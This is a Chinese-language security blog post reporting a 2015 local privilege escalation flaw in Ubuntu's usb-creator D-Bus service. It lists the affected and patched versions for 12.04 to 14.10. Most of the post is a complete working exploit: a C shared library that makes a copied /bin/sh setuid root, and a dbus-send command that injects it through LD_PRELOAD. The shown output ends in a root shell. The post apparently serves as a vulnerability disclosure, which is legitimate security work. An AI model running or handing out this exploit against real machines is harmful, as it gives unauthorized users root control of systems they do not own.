最新文章:

首页 Sec

Ubuntu曝本地权限提升漏洞 影响12.04—14.10版本(含EXP)

发布时间:2015年05月29日 评论数:抢沙发 阅读数:1125

     

    今天Ubuntu12.04-14.10曝出本地权限提升漏洞,该漏洞由Google的大神Tavis Ormandy发出,包含漏洞利用测试程序。

    漏洞等级:

    高危

    影响范围

    Ubuntu Precise (12.04LTS) <= usb-creator: 0.2.38.3ubuntu (Patched in: 0.2.38.3ubuntu0.1)
    Ubuntu Trusty (14.04LTS) <= usb-creator 0.2.56.3ubuntu (Patched in: 0.2.56.3ubuntu0.1)
    Ubuntu Utopic (14.10) <= usb-creator 0.2.62ubuntu0.2 (Patched in: 0.2.62ubuntu0.3)

    漏洞测试EXP

    $ cat > test.c
    void __attribute__((constructor)) init (void)
    {
    chown("/tmp/test", 0, 0);
    chmod("/tmp/test", 04755);
    }
    ^D
    $ gcc -shared -fPIC -o /tmp/test.so test.c
    $ cp /bin/sh /tmp/test
    $ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator /com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"
    method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
    $ ls -l /tmp/test
    -rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
    $ /tmp/test
    # id
    euid=0(root) groups=0(root)
二维码加载中...
本文作者:Mr.linus      文章标题: Ubuntu曝本地权限提升漏洞 影响12.04—14.10版本(含EXP)
本文地址:http://www.90qj.com/135  百度暂未收录本文
版权声明:若无注明,本文皆为“挨踢 Blog”原创,转载请保留文章出处。
挤眼 亲亲 咆哮 开心 想想 可怜 糗大了 委屈 哈哈 小声点 右哼哼 左哼哼 疑问 坏笑 赚钱啦 悲伤 耍酷 勾引 厉害 握手 耶 嘻嘻 害羞 鼓掌 馋嘴 抓狂 抱抱 围观 威武 给力
提交评论

清空信息
关闭评论